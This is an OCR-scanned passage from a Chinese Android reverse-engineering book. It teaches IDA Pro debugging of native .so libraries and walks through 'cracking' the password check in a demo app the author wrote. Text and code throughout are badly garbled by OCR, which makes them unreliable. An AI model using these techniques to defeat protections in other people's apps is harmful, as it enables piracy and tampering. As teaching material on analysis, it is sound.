库 文 件 ， 所 以 本 章 介 绍 如何 调 试 so 文件 的 内 容 ， 从 而 提高 破解 成 功率 。 


22.1 1IDA 中 的 单 用 快捷 键 


前 一 草 中 使 用 IDA 工 具 静 态 分 析 so 文 件 ， 通 过 分 析 ARM 指 令 ， 来 获取 破解 信息 ， 比 如 用 打印 的 log 信 息 来 破解 apk。 那 时 候 
就 已 经 介绍 了 如 何 使 用 IDA 工 具 ， 如 图 22-1 所 示 。 


TERMALE TTE TTZE2TTE3Jj > T: T uu ==. h 


Library function —— Data Bl Regular function Bl Unexplored BMB Instruction External symbol 


S ЕСЕ Bs ШГП 
so 的 指令 


so 中 的 函数 窗口 
iiia 


This file has been generated by The Interactive Disasseml 
Copyright (c) 2815 Hex-Rays, <support@hex-rays.co 

License info: h8-B611-723h5-BB 
Doskey Lee, Kingsoft Internet Security Software 


Input HD5 : 77R61D85F72EFR5F h8D8098337CC215B5 
Input CRC32 : 70913C9C 


File Name : [5:\Users\jiangwei1-gvDesktopvhndroid 中 的 动态 调 
Format : ELF for ARM (Shared object) 

Interpreter '/sustem/bin/linker' 

Heeded Library 'liblog.so' 

Needed Library 'libstdc**.so"' 

Needed Library 'libm.so' 

Heeded Library 'libc.so' 

Needed Library 'libdl.so' 

Shared Hame 'libencrypt.so' 


cryptdemo MainActivity isE« 


Options : EF ARM SOFT FLORT 
ERBI version: 5 


; Processor : ARM 
; ARNM жанаа: ñRMuSTE 


—gnu_Unwind_RaiseException ; Target assembler: Generic assembler for ñRM 
. gnu Unwind ForcedUnwind - : Little endian 


_gnu_Unwind_Resume 
_gnu_Unwind_Resume_or_Rethrow 
_Unwind_Complete 
-Unwind_DeleteException ; Segment tupe: Pure code 
_Unwind_VRS_Get ñREñ .plt, CODE 
pue rar - ; ORG 8х098 
nwi 
sub_1328 [SP, 8-4]? 
_gnu_Unwind_Backtrace -( GLOBAL OFFSET TABLE - GxDA8) 


sub 13В0 | PC, LR ; ; -SLOBAL OFFSET TABLE. 
. aeabi unwind cpp. prO 


. aeabi unwind cpp pr1 
—aeabi unwind cpp pr2 : DCD GLOBAL OFFSET TABLE - GxDA8 ; DATA XREF: 
-Unwind VRS Pop [8888888C BYTES: COLLAPSED FUNCTION сха atexit. PRESS CTRL 
restore core regs [8888888C BYTES: COLLAPSED FUNCTION  cxa finalize. PRESS СТЕ 
—gnu Unwind Restore VFP [8888888C BYTES: COLLAPSED FUNCTION strlen. PRESS CTRL-NUHPAL 
—gnu Unwind Save VFP [8888888C BYTES: COLLAPSED FUNCTION malloc. PRESS CTRL-NUHPAL 
pamm „эы 


Line 15 of 119 00000D98 00000D98: .plt:00000D98 (Synchronized with Hex View-1) 


图 22-1 IDA 工 具 的 窗口 视图 


IDA 工 具有 多 个 窗口 ， 也 有 多 个 视图 ， 用 到 最 多 的 如 下 所 示 : 


: Function Window 对 应 so 函数 区 域 : 在 这 里 可 以 使 用 ctrl+f 进 行 函 数 的 搜索 。 


: IDA View 对 应 so 中 代码 指令 视图 : 在 这 里 可 以 查看 具体 函数 对 应 的 ARM 指 令 代 码 。 


: Нех View 对 应 so 的 十 六 进 制 数据 视图 : 在 这 里 可 以 查看 ARM 指 令 对 应 的 数据 等 。 


下 面 先 介绍 IDA 中 一 些 弟 用 的 快捷 键 。 


1.ARM 指 令 转 化 成 C 语 言 快捷 键 


强大 的 F5 快 捷 键 可 以 将 ARM 指 令 转 化 成 可 读 的 C 语 言 ， 能 帮助 分 析 ， 如 下 所 示 : 


.text:88888EC8 EXPORT Jaua cn wjdiankong encryptdemo HMainfictiuity isEquals 
.text:88888EC8 Jaua cn wjdiankong encryptdemo HMainfictiuvity isEquals 

-text : 88888ECS8 PUSH (R3-R7,LR? 

.text:88888ECA MOUS R3, H0xñ9 

.Ltext : 88888ECC MOUS R6, R2 

-text : 88888ECE LDR R2, [R8] 

.text:88888ED8 LSLS R3, R3, #2 

.Ltext:88888ED2 MOUS R1, Вб 

.Ltext:88888ED^ LDR R3, [R2,R3] 


首先 选中 需要 翻译 成 C 语 言 的 消 数 ， 然 后 按 下 F5， 如 下 所 示 : 


int  fastcall Java cn wjdiankong encryptdemo Mainñctiuitu isEquals(int al, int a2, int аз) 
Ç 
int v3; // гб@1 
int uh; // F5G@1 
const char xu5; // 41 
const char wu6; // r401 
size t u7; // roei 
char *u8; // Р91 
int u9; // r Bal 
int u18; // r3@1 
const char xu11; // Foa2 
unsigned int v12; // r7(a2 


UJ = a3; 
v4 = al; 
v5 = (const char x)(x(int (*x)(uoid))(*x( DUORD 关 )a1 + 676))(); 
уб = ub; 


о? = ]_J_strlen(u5); 

u8 = (char *)j_J_malloc(u7); 
j_j_strcpu(u8, u6); 

u9 = is number(u6); 


u18 = B; 
if ( v9 ) 
i 


viid = (const char *x)get encrypt str(u6); 
u12 = j j strcnp("ssBCqpBssP", 011); 
(*(void ( fastcall xx)(int, int, const char x))(*( DUORD x)uh + 688))(uh, v3, об); 
u18 = u12 <= 8; 
; 


return u18; 


IBERIA, АЈА МІВ). INIRA A aE P RELIEF, ЕКЯПУ3 +676. ЯЛ ДЫ 
址 作为 一 个 方法 指针 进行 方法 调用 ， 并且 第 一 个 参数 束 是 指针 目 己 ,比如 (v34676) (v3..) „ 230) Ет МІ 
的 JNIEnv 广 法。 因为 IDA 并 不 会 目 动 对 这 些 方法 进行 识别 ， 所 以 当 对 so 文件 进行 调试 的 时 候 经 单 会 见 到 却 摘 不 清和 花 这 个 函数 究竟 
在 干什么 ， 因 为 这 个 函数 实在 是 太 抽 象 了 。 解 决 方法 非 单 简 单 ， 只 需要 对 JNIEnv 指 针 做 一 个 类 型 转换 即 可 。 比 如 说 上 面 提 到 a1 
和 v4 外 针 ， 如 下 所 示 : 


u3 = a3; 

un = a1; 

u5 = (const char *)(*(int (**)(uoid))(*( DWORD фал + ер: 

уб = ub; 

у? = j j strlen(u5); int a1; ZZ rüas8 ISAR 


u8 - (char *)j J nalloc(u7); ` 


j.j strcpy(v8, v6); xXx HUE S1] AE gr Je IE ER E — T CHE ix НН: 
ug = 15 numnber(u6); mM ^. - £F. LEA - fx - " 

v18 - 8; SF ХР Th ET, 我 们 可 以 使 用 y 快 
if ( v9 ) 


LESE, fA PE, JNIEnv BI n] 


ull = (const char *x)get encrypt strí(uó); 


u12 = j j strcnp(" "ssBCqpBssP", v11); 
(*(void ( ҒаѕЕса11 *xx)(int, int, const char *))(*( DWORD 


ui = n1? “<= ñ= 


可 以 选中 a1 变 量 ， 然 后 按 一 下 y 键 ， 如 图 22-2 所 示 。 


P Please enter a string 


Please enter the type declaration 


9222 ”选中 变量 
然后 将 类 型 声明 为 JNIEnv*， 如 图 22-3 所 示 。 


P Please enter a string 


Flease enter the type declaration  JHIEnv*| 


22-3 ”设置 JINIEnv* 指 针 


确定 之 后 再 来 看 ， 如 下 所 示 : 


u3 = a3; 

un = al; 

vő = у5; 

у? = ]_]_5їг1еп(у5); 

v8 = (char *x)j j malloc(u?7); 


ј ј strcpy(vu8, об); 
09 = is питђек (уб); 


u18 = 8; 
if ( v9 ) 
i 
u11 (const char *x)get encrypt str(v6); 


v12 = j j strcnp("ssBCqpBssP", 011); 
((void ( fastcall *x)(JNIEnu *, int, const char x)p(*xuh)-»ReleaseStringUTFChars)(u^h, v3, уб); 
u18 = v12 <= 8; 

H 


return u18; 


修改 之 后 是 不 是 瞬间 清晰 了 很 多 。 另 外 还 总 结 了 所 有 JNIEnv 方 法 对 应 的 数字 、 地 址 以 及 方法 声明 ， 如 下 所 示 : 


672  GetStringzUTFLenzth jsize (*)( JNIEnv*, jstring ) 
676 IGetStrinsUTFChars const char* (*)( JNIEnv*, jstring, jboolean* ) 


680 ReleaseStringUTFChars void (*)( JNIEnv*, jstring, const char* ) 
684 GetàrrayLength jsize (*)( JNIEnv*, jarray ) 
688 NewObjectárray јорјесіАггау (*)( JNIEnv*, jsize, jclass, jobject ) 


2. 打 开 字 符 串 内 容 窗口 快捷 键 


用 shirt+F12 快 捷 键 快速 打开 so 中 所 有 的 字符 串 内 容 窗口 ， 如 图 22-4 所 示 。 


IDA Viewh 加 Strings window E w 


ress engt = srin 
Add | Length Typ String 


UA, ssBCapBssP 
‘s| .data:00004004 00000013 C zytyrTRA*BniqCPpVs 


E224 so 中 字符 囊 内 容 窗口 
有 时 候 ， 字 符 串 是 一 个 非常 重要 的 信息 ， 特 别 是 对 于 破解 的 时 候 ， 可 能 就 是 密码 ， 或 者 是 密码 库 信息 。 
3. 定 位 so 中 段 地 址 快捷 键 


Ctrl+S 快 捷 键 有 两 个 用 途 ， 在 正常 打开 so 文件 的 IDA View 视 图 的 时 候 ， 可 以 查看 so 对 应 的 段 信 息 ， 如 图 22-5 所 示 。 


Base Type Class 


CODE 
dword 


EH 


init 
go 


= = 22 2 2 ana Zm m E> m 
e ë ë = 5 = ë Së = É 


图 22-5 ”打开 so 中 的 段 信息 


可 以 快速 得 到 一 个 段 的 开始 位 置 和 结束 位 置 ， 不 过 这 个 位 置 是 相对 位 置 ， 不 是 so 映射 到 内 存 之 后 的 位 置 ， 关 于 so 中 的 段 信 


恩 ， 已 经 在 前 面 章节 中 详细 介绍 。 


当 在 调试 页 面 的 时 候 ， 用 Ctrl+S 键 可 以 快速 定位 到 想 要 调试 的 so 文件 映 冉 到 内 存 的 地 址 ， 如 图 22-6 所 示 。 


L | JA L | Ann -z 304 
Ai d i | = [ 1 Ë E LE 


Hle Edit Jump Search View | Debugger Options Windows Help 
ДЕ 加 О [Renote ABMLinua/Anaroid debugger Y АЕМ гаі Android debugger - | зе (аР) : ЕП Bd d* [Ж = FE sf = 2a Dl, [2] Is б 


:| Library function Data D Regular function | | Unexplored P Instruction External symbol 


Structures 


[E] ma vie PC 


^" libc.so:hB818C728 CHH il iax 18088 
z  libc. 50:4018C724 BALS 


Name Start 


cn.wjdiankong.encryptdemo 1.apk 74FAG6000 ТАҒАРООО 
cnwdiankong.encryptdemo 1.apk ТАҒАРООО ТАҒЕЗООО 
libencrypt.so JAFEADOOD JAFEG6000 
libencrypt.sa 7AFEG6000 ТАҒЕТООО 
libencrypt.so 74FE7000 74FE8000 
cn.wjdiankong.encryptdemo 1.apk 74FF4000 73FFD000 
dataĝapp@cn.wjdiankong.encryptdemo_Lapk.. 74FFD000 75300000 


= m m m E> > = 
=й rJ g 


sees ie e Ie ele] 
= 
ococoE 


ctrl+ 值 接 搜 索 指 定 的 50 交 件 名 
= 


encry 


Line 3 of 7 


图 22-6 ”定位 调试 的 so 文件 的 内 存 地 址 


一 般 一 个 程序 肯定 会 包含 多 个 so 文件 ， 比 如 系统 的 so 文件 残 有 好 多 ， 一 般 都 是 在 /system/lib 下 面 ， 当 然 也 有 目 己 的 S0， 这 
里 可 看 到 开始 位 置 和 结束 位 置 就 是 这 个 so 文件 映射 到 内 存 中 ， 如 下 所 示 : 


C:NUsersNjiangweil-g>adb shell 一 般 这 里 会 有 多 个 so 文件 ， 因 为 有 的 是 代码 so， 有 
shell@pisces:/ 5 su 的 是 数据 so， 一 般 是 看 代码 so 位 置 ， 后 面 需要 调试 ， 
root@pisces:/ # ps |grep cn.wjdiankong ”一般 代 人 码 so 有 一 个 特点 ， 即 有 执行 权限 x 
u0_a113 26050 9466 881900 47808 ffffffff 4007d71c S cn.wjdiankong.encryptdemo 


root@pisces:/ # cd /proc/26050 内 存 映 射 信息 
root@pisces:/proc/26050 # 11 |grep maps 

-pfeereep-- cu uif 0 uiis5 
-r--r--r-- u0 а113 u0 a113 0 2016-06-23 20:41 smaps 


rootGpisces:/proc/26050 4$ cat maps l|grep епсгу 

74£14000-74f1e000 r--s 00155000 pb3:lb 8220 
encryptdemo-2.apk 

74£1e000-74f52000 r--s 00039000 b3:1b 8220 
encryptdemo-2.apk 


/data/app/cn.wjdiankong. 


/data/app/cn.wjdiankong. 


74£52000-74£55000 
encryptdemo-2/libencrvpt.so 

74£55000-74f£56000 r--p 00002000 b3:1b 57392 /data/app-lib/cn.wjdiankong. 
encryptdemo-2/libencrvpt.so 

74£56000-74£57000 rw-p 00003000 b3:1b 57392 /data/app-lib/cn.wjdiankong. 


encryptdemo-2/libencrvpt.so 
这 里 可 以 使 用 cat 命 令 查看 一 个 进程 的 内 存 映射 信息 : 


cat /proc/ [pid] /maps 


看 到 映射 信息 中 有 多 个 so 文件 ， 其 实 这 不 是 多 个 so 文件 ， 而 是 so 文件 中 对 应 的 不 同 Segement 信 息 被 映射 到 内 存 中 的 ， 一 般 
是 代码 段 、 数 据 段 等 ， 因 为 需要 调试 代码 ， 所 以 只 关心 代码 段 。 代 码 段 有 一 个 特点 束 是 具有 执行 权限 x， 只 需要 找到 权限 中 有 x 的 
那 段 数据 即 可 。 


4. 跳 转 到 指定 地 址 快捷 键 


在 IDA 调 试 页 面 的 时 候 ， 可 以 使 用 G 键 快速 跳 转 到 指定 的 内 存 位 置 ， 如 图 22-7 所 示 。 


libc.s0:4010C720 CHH 

libc.so0:58180C725 BXLS 
libc.s0:^48180728 RSB 

libc.so:4818C72C0 B 


BE we 


P Jump to address — 


Tump address  T4EAA1A8| 


libc.so:^81 


Hex View-l 


ñ 
libc.so:^4818C73B DCB OEF 


RB, НИх1ИИЙ 
LR 

RH, RB, HD 
sub 50126074 


ирер ешн С ЛЕНЕ == 
libc.so:A4818C738 inatify init DCB Fi 
libc.s0:54818C731 DCE üxCü 


„Гг 


wara 


UNKNOWN 4010C71C: libc.so:epoll wait+C (Synchronized wi 


图 22-7 跳 转 到 指定 内 存 位 置 


这 里 的 跳 转 地 址 是 可 以 算出 来 的 。 比 如 现在 想 跳 转 到 A 函数 ， 然 后 下 断 点 ， 那 么 可 以 使 用 上 面 襄 到 的 Ctrl+S 查 找到 so 文件 的 
内 存 开始 的 基地 址 ， 然 后 再 用 IDA View 中 查看 A 消 数 对 应 的 相对 地 址 ， 相 加 就 是 绝对 地 址 ， 然 后 跳 转 到 即 可 ， 比 如 这 里 的 : 
Java cn wjdiankong encryptdemo MainActivity isEquals 函 数 的 IDA View 中 的 相对 地 址 是 (也 就 是 so 文件 的 地 址 ) E9C, 


如 下 所 示 : 


= 有 


-text :88888E9C 


上 面 看 到 so 文件 映射 到 内 存 的 基地 址 为 74FE4000， 如 下 所 示 : 


.text: 000800E9C EXPORT Jaua cn wjdiankong encryptdemo MainActivity isEquals 
| siue va cn wjdiankong encryptdemo HMainfictivity isEquals 

-text : 8888BE9C PUSH (R3-R7,LR? 

.text:88888E9E MOU R1, R2 

.text:88888ER8 LDR R3, [R8] 

-text :088008Eñn? MOU R7, R2 

.text: 88888ERn^ HOUS R2, #9 

.text:88888ER6 MOU R6. R8 


74FAF000 
74FE4000 


74FE3000 
74FE6000 


a| cn.wjdiankong.encryptdemo 1.apk 


HJ libencrypt.so 


s>) libencrypt.so — JAFEO000 7AFE/000 T 
libencrypt.so 7АЕЕ 7000 74FE8000 

45| cn.wjdiankong.encryptdemo 1.apk 74FF4000 74FFDOOO0 

s| datat?app cn.wjdiankong.encryptdemo 1l.apk.. 74FFD000 75300000 


那么 跳 转 地 址 就 是 74FE4000+E9C=74FE4E9C。 


注 晶 ， 只 要 程序 没有 退出 ， 一 般 这 里 的 基地 址 在 运行 中 的 值 残 不 会 变 ， 因 为 程序 的 数据 已 经 加 载 到 内 存 中 了 。 同 时 相对 地 址 


是 永远 不 会 变 的 ， 只 有 在 修改 so 文件 的 时 候 ， 文 件 的 大 小 改变 了 ， 可 能 相对 地 址 会 改变 ， 其 他 情况 下 不 会 改变 ， 相 对 地 址 残 是 
数据 在 整个 so 文件 中 的 位 置 。 这 里 可 以 看 到 消 数 映射 到 内 存 中 的 绝对 地 址 ， 如 下 所 示 : 


iu ы: masm "шы шош ыг т ge comm тш ms m ma a r 


libencrypt.so:74FE4E9C Java cn vjdiankong encryuptdemo Mainfictivity isEquals 


^ libencrypt.so:74FEŁE9C PUSH | {R3-R7 ,LR} 
= libencrypt.so:74FEŁE9E MOU R1, R2 
= libencrypt.so:74FE4EA0 LDR R3, [R8] 
= libencrupt.so:7BFENEñ2 MOU R7, R2 
= libencrypt .so:74FE4EA4 MOUS R2, #0 
^ libencrypt.so:74FE4EĤŐ MOU R6, RB 
 libencrupt.so:738FEHNHEñ8 LDR.W R3, [R3,H#Bx2ñ1] 
 libencrupt.so:78FEMEñC BLX R3 
^ libencrypt.so:75FEAhEARE MOU R5, R8 
^ libencrypt.so:754FEhEBB BLX unk 7ZA^4FEAD9A 
RHS RUBEERUTREETU ELT ја, AIEEE, СМЕРА АЬШЕ, RachPSENUHILASSIARM$RSUIR 7, ST 
所 示 : 
g libencrupt. 50: 9ҒЕЧЕ9С Java cn wjdiankong encryptdemo Hainñctiuitu isEquals DCB BxF8 ; 
© libencrypt.so:74FE4E9D DCB 8xB5 ; 
^ libencrypt.so:7&5FEAhE9E DCB 8x11 : : | : > 
^ libencrypt.so:74FE4E9F DCB 8xhó ; F iC Н 2 DCB 效 据 ， dl ros PEE 
* libencrypt .so:74FE4EAQ DCB 3 | ора Ара HEE A Р 
^ libencrypt.so:74FE4EAT1 DCB 8x68 ; h Р 键 进行 代码 的 转化 即 可 
^ Bibencrypt.so:75FEAER2 DCB 8x17 
^ libencrypt.so:74FE4EA3 DCB 8xhó ; F 
* libencrypt.so:74FE4EA4 DCB ü 
* Bibencrypt.so:?75FEh&ER5 DCB 8x22 ; " 
5. 调 试 快捷 键 


调试 快捷 键 包括 : F8 单 步调 试 ，F7 单 步 进 入 调试 ， 如 下 所 示 : 


libencrypt.so:74FEŁE9C Java cn wjdiankong encryptdemo Mainñctiuitu isEquals 


libencrypt.so:7hFEhE9E MOU R1, R2 
libencrypt.so:75FEAhERB LDR R3, [R8] 
libencrypt.so:7hFEhER2 MOU R7, R2 


EAE Uu а, BARAS, КАВ, кат НУК ка, 322ГЕ А00], аЛа РӘ 


键 , 或 者 点 击 运 行 按 钮 (绿色 右 箭头 ) ， 即 可 运行 程序 ， 如 图 22-8 所 示 。 


СФ IDA - CUsersWIANGW~1WAppData\LocalvTempida62686.idb (app. process) 
Fle Edt Jump Search View | Debugger Options Windows Help 


T3 LJ Remote ABMLirux/Android debugger 7 +e [id | d^ EP Fg 


гү 


Library function llata P Regular function | | Unexplored P Instruction 
922-8 F9 快 捷 键 


其 中 还 有 暂停 和 结束 按钮 。 运 行 之 后 再 点 击 so 的 native 国 数 ， 触 发 断 点 逻辑 ， 如 下 所 示 : 


=R. и-и X E E u= ü k. j = m =ч = ü UNE LTE оч 


libencrypt.so:74FE4E9C Java cn wjdiankong encruptdemo Hainfictiuity isEquals 


libencrypt .so:74FE4E9E MOU R1, R2 

РСА libencrypt.so:75FEhER8 LDR R3, [R8] | 
libencrypt.so:7h5FEhER2 MOU R/, R2 
libencrypt.so:75FEAER^ MOUS R2, H8 
libencrypt.so:75FEhAER6 MOU R6, RƏ 


这 时 候 ， 看 到 进入 调试 界面 ， 点 击 F8 可 以 单 步调 试 ， 看 到 有 一 个 PC 指示 器 。 其 实在 ARM 中 PC 是 一 个 特殊 的 寄存 器 ， 用 来 
存储 当前 指令 的 地 址 。 


忌 结 一 下 IDA 在 调试 so 文件 的 时 候 需 要 用 到 的 快捷 键 : 
- Shift+F12 ”快速 查看 so 文件 中 的 字符 串 信息 
-F5 可 以 将 ARM 指 令 转 化 成 可 读 的 C 代 码 ， 同 时 可 以 使 用 Y 键 ， 修 改 INIEnv 的 函数 方法 名 。 


.Ctrl+S 有 两 个 用 途 ， 在 IDA View 页 面 中 可 以 查看 so 文件 的 所 有 段 信息 ， 在 调试 页 面 可 以 查看 程序 所 有 so 文件 映射 到 内 存 
的 基地 址 。 


С 可 以 在 调试 界面 快速 跳 转 到 指定 的 绝对 地 址 ， 进 行 下 断 点 调试 。 如 果 跳 转 到 目的 地 址 之 后 ， 发 现 是 DCB 数 据 的 话 ， 可 
以 使 用 P 键 进行 转化 。 


.F7 可 以 单 步 进入 调试 ，F8 键 可 以 单 步 调试 。 


222 构造 so 案例 


了 解 1DA 工 具 之 后 ， 就 可 以 开始 动手 操作 了 。 为 了 方便 开始 ， 先 自己 写 一 个 简单 的 Android native 层 代码 ， 然 后 用 IDA 进 行 
分 析 即 可 。 这 里 可 以 使 用 Android studio 新 建 一 个 简单 工程 ， 然 后 创建 JNI。 如 何在 Android Studio 中 开 友 NDK， 前 面 章节 中 
已 经 详细 介绍 了 。 下 面 直接 在 Android Studio 中 新 建 了 一 个 Native 项 目 ， 这 里 关于 native 项 目的 代码 不 想 解 释 太 多 ， 就 是 Java 
层 传递 了 用 户 输入 的 密码 ， 然 后 native 做 了 校 验 过 程 ， 把 校 验 结果 返回 到 Java 层 。 如 下 所 示 : 


public class MainActivity extends Activity { 


Statie ( 
System.loadLibrary("encrypt"); 


QGOverride 


protected void onCreate(Bundle savedInstanceState) 


super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 


{ 


findViewByIG(R.id.btn).setOnClickListener(new View.OnClickListener() { 


boolean res - isEquals("123456"); 
Log.i("jw", "res:" + res); 


143 


private native boolean isEquals(String str); 


(JNIEnv * env, jobject obj, jstring str) 


JNIEXPORT jboolean JNICALL Java cn wjdiankong encrydemo MainActivity isEquals 


const char *strAry = (*env)-»GetStringUTFChars(env, str, 0); 


int len - strlen(strAry); 
char* dest - (char*)malloc(len); 
strcpy(dest, strAry); 


int number - is number(strAry); 
if (number == 0) { 
return O0; 


char* encry str = get encrypt str(strAry); 
const char* pas - "ssBCqpBssP"; 
int result = strcmp (pas, encry str); 


(*env)-»ReleaseStringUTFChars(env, str, strAry); 


if(result == 0) { 
return 1; 
}elset 


return 0; 


ГЕТЕ ВУД ЕЕ 


具体 的 校 验 过 程 这 里 不 再 解释 了 。 运 行 项 目 之 后 得 到 apk 文 件 ， 那 么 下 面 束 开始 破解 旅程 了 。 


下 面 开 始 破 解 编 译 之 后 的 apk 文 件 。 


22.3.1 ”获取 应 用 的 so 文件 


按照 国际 惯例 ， 直 接 使 用 解压 软件 ， 获 取 应 用 apk 中 的 so 文件 ， 如 图 22-9 所 示 。 


ЁЗ encrypt.apk\lib\armeabi-v7a - ZIP БЕЊ, 解 包 大 小 为 3,481,726 字 节 


| 
| 
| 
| 


D 


B libencrypt.so 
922-9 ”解压 so 文件 
得 到 libencrypt.so 文 件 之 后 ， 使 用 IDA 打 开 它 ， 如 图 22-10 所 示 。 


一 般 so 中 的 函数 方法 名 都 是 : Java_ 类 名 方法 名 。 那 么 这 里 直接 搜 Java 天 键 字 即 可 ， 或 者 使 用 d-gui 工 具 找到 指定 的 native 
方法 ， 如 图 22-11 所 示 。 


Edit Jump Search View Debugger Options Windows Help 


一 一 一 一 一 一 


iig ei EAS AS у а ӘӘ: t uh XU D О (ваныя) *e P): 


Library function WB Data BMB Regular function BÉ Unexplored BMB Instruction ИЙ External symbol 


| касыз: windon | с в x | Œ IDA ViewA Ba L 
р - Б Е - 


JUBDDD9 S 


so 的 指令 View 窗口 jplt:eeeeep98 
.p1t:88880D98 


so 中 的 函数 窗口 | "Pt :0000000 
这 里 我 们 可 以 使 用 -9900 的 9 


| | АДАЙ .plt:88880D98 
nd Find exidx ctr|+F #Ë 3 BE fT РА .p1t:00080D98 
: -Plt :00000D98 
数 的 搜索 .p1t:88888D98 
.p1t:00000D98 
.pit:88888D98 
-р1—:00000098 
.p1t:00000D98 
-Plt :08000098 
.p1t:00000D98 
.pl1t:888800D98 
.p1t:88800D98 
.p1t:00000D098 
.plt:88880D98 
.р11:00000098 
.р1—:00000098 
.p1t:88880D98 
nullsub 1 .p1t:00000D98 
sub 10DE .p1t:88880D98 
sub 1118 .p1t:88880D98 ; Processor : АВМ 
-Unwind GetCFA X | -plt:00000D98 ; АВМ architecture: ñRMuSTE 
—gnu Unwind RaiseException .p1t:88888D98 Target assembler: Generic assembler for АВМ 
—— r—— .p1t:00000D98 ; Byte sex : Little endian 
—gnu Unwind Resume .-p1t :080000D98 
—gnu Unwind Resume or Rethrow "plt:00000098 ; 
1 кишш | .plt:00000D98 
-Unwind DeleteException .p1t:88888D98 ; Segment type: Pure code 
-Unwind VRS Get .р11:00000098 AREA .plt, CODE 
sub_12DE -p1t :00000D98 ; ORG 0xD98 
-Unwind VRS Set -Plt : 88808098 
sub_1328 .p1t:00000D98 [SP,1t-4]* 
..gnu Unwind Backtrace .p1t:88888D9C -( GLOBAL OFFSET TABLE - 8xDf8) 
sub 13B0 — .plt:00000Dñ0 PC, LR ; GLOBAL OFFSET TABLE - 
— aep тє: юа» 
—aeabi_unwind_cpp_pr2 -plt:00000Dñ8 off_DA8 DCD GLOBAL OFFSET TABLE - 0xDñ8 ; DATA XREF: 
-Unwind VRS Pop .pit:88880DaC ; [00000800C BYTES: COLLAPSED FUNCTION _ сха atexit. PRESS CTRL 
restore core regs .p1t:88880DB8 ; [8808888С BYTES: COLLAPSED FUNCTION сха finalize. PRESS СТЕ 
—gnu Unwind Restore УР .p1t:00000DC^ ; [0000000C BYTES: COLLAPSED FUNCTION strlen. PRESS СТВІ -МОМРАГ 
—gnu Unwind Save МЕР .pit:88888DD8 ; [8808888C BYTES: COLLAPSED FUNCTION malloc. PRESS CTRL-NUMPAD 


License info: 58-B611-7234-BB 
Doskey Lee, Kingsoft Internet Security Software 


Input MD5 77R61D85F 72EFR5F^aD098337CC215B5 
Input CRC32 78913C9C€ 


File Name C:\Users\jiangwei1-g\DesktopsAndroid 中 的 动态 调 
Format ELF for ARM (Shared object) 

Interpreter '/system/bin/linker' 

Needed Library 'liblog.so' 

Needed Library 'libstdc++.so' 

Heeded Library 'libm.so' 

Heeded Library 'libc.so' 

Needed Library 'libdl.so' 

Shared Hame 'libencrypt.so' 


Options : EF АВМ SOFT FLORT 
ERBI version: 5 


Line 15 of 119 00000D98 00000D98: .p1t:00000D98 (Synchronized with Hex View-1) 


图 22-10 IDA 打 开 so 文 件 


[F| Functions wlndow [] m x 


Function name 
Java cn wj|diankong encryptdemo MainActivity isEquals 
图 22-11 native 函数 名 


双击 即 可 在 右边 的 IDA View 页 面 中 看 到 Java_cn_ wjdiankong encryptdemo MainActivity isEquals 函 数 的 指令 代码 ， 如 
图 22-12 所 示 。 


可 以 简 蛙 分 析 一 下 这 段 捐 令 代码 : 


. PUSH{r3-r7，]t} 是 保存 tr3，r14，r5，r16，rt7，]t 的 值 到 内 存 的 栈 中 ， 那 么 最 后 当 执 行 完 菜 操 作 后 ， 想 返回 到 ]r 指 向 的 地 方 执 
行 ， 当 然 要 给 pc 了 ， 因 为 pc 保留 下 一 条 CPU 即 将 执行 的 指令 ， 只 有 给 了 pc， 下 一 条 指令 才 会 执行 到 lr 指向 的 地 方 。 


: 程序 寄存 器 ОТ) 保留 下 一 条 CPU 即将 执行 的 指令 c o 
des 连接 返回 寄存 路， 保留 函数 返回 后 ， 下 一 条 应 执行 的 指令 。 


-text -0000808E9C EXPORT Jaua cn »-wjdiankong. encryptdemo Mainfictiuity isEquals 
.text:88888E9C Jaua cn vjdiankang.s i s” i 

.text:08088E9E T E рс: 程序 寄存 各 ,保留 下 一 条 CPU 
.text:88888EAn8 LDR R3, [R8] u a 


-text : 88888E02 HOU R7, R2 Ir :连接 返回 寄存 器 ， 保留 函数 返回 
-text :068606EA4 HOUS R2, #0 


„Сехї:88888Ейб MOU R6, RƏ 后 ， 下 一 条 应 执行 的 指令 PUSH (r4-77, 
.text:80880EAn8 LDR.W R3, [R3,#0x2A4] Ir! 保存 r4, r5, r6, r7, Ir 的 值 到 内 存 的 栈 


бе ре "== „ 中 ， 那 么 最 后 当 执 行 完 某 操作 后 ， 你 
.text :8888ВЕВВ BLX en 想 返 回 到 аа ад 当然 要 


.text :88888EBa KZ m | ру x nalloc 给 pc 了， 因为 pc 保留 下 一 条 CPU 即 


үчин ончен нд d 指令 ， AMT fpc, 下 一 条 
"text - 80000EBE 指 ~ 令 才 会 执行 到 Ir JR m] HJ HD 77 
-text-00000DEC O : i De 

.text: 80088EC^ 

-text :80888ECÓ ; 

.text:8888BEC8 ,, Ч get encrypt str 
.text:88888ECC 的 指令 ， R1, RB ; s2 、 
-text:00000ECE RO 中 的 值 为 0， R8, -(aSsbcqpbssp - 6xED4) [W T In] (EL f£ 8 КІ 
.text:808088ED8 就 跳 转 到 locret ; "55BCqpBSsSsP” 中 USA Ir 3k Bus Н 


.text :00800ED2 ( 
„сех: ввөвөєре EEC 处 tH: ssBCqpBssP 到 


.text:88888EDS8 R0 中 在 调用 strcmp 


.text :88888EDA 进行 字符 串 的 比较 
.text:88888EDC | [R3 ,#6x2A8] 


.text:88888EE8 RÜ 

.text:88880EE2 R6 

.text:80888EEA 

-text :80888EE6 А R4 

-text : 808888EER R8, #5 

-text :88888EEC 

.text:88888EEC locret EEC ; СО REF: Java cn wjdiankong encryptdemo Маі 
.-text:80880EEC ; End of function Jaua cn wjdiankong encryptdemo Hainfictiuvity isEquals 

.text:88888EEC 

.text:888880EEC ; 


encrypt str 


图 22-12 A JN S SS ARMAS 4-488 


这 个 和 函数 最 后 面 的 POP{r3-r7，pc 是 相对 应 的 。 


然后 是 调用 了 strlen、malloc、strcpy 等 系统 函数 ， 在 每 次 使 用 BLX 和 BL 指 令 调 用 这 些 冰 数 的 时 候 ， 都 友 现 了 一 个 规律 : 在 
调用 它们 之 前 一 般 都 是 用 MOV 指 令 来 传递 参数 值 的 ， 比 如 这 里 的 R5 里 面 存储 的 束 是 strlen 消 数 的 参数 ，R0 束 是 is_number 阴 数 
的 参数 ， 如 下 代码 所 示 。 这 样 分 析 之 后 ， 在 后 面 的 动态 调试 的 过 程 中 可 以 得 到 函数 的 入 口 参数 值 ， 这 样 残 能 得 到 一 些 重要 信息 。 


HOU R5, В «фа 这 里 我 们 可 以 看 到 ， 一 般 在 使 用 BLX 或 者 是 


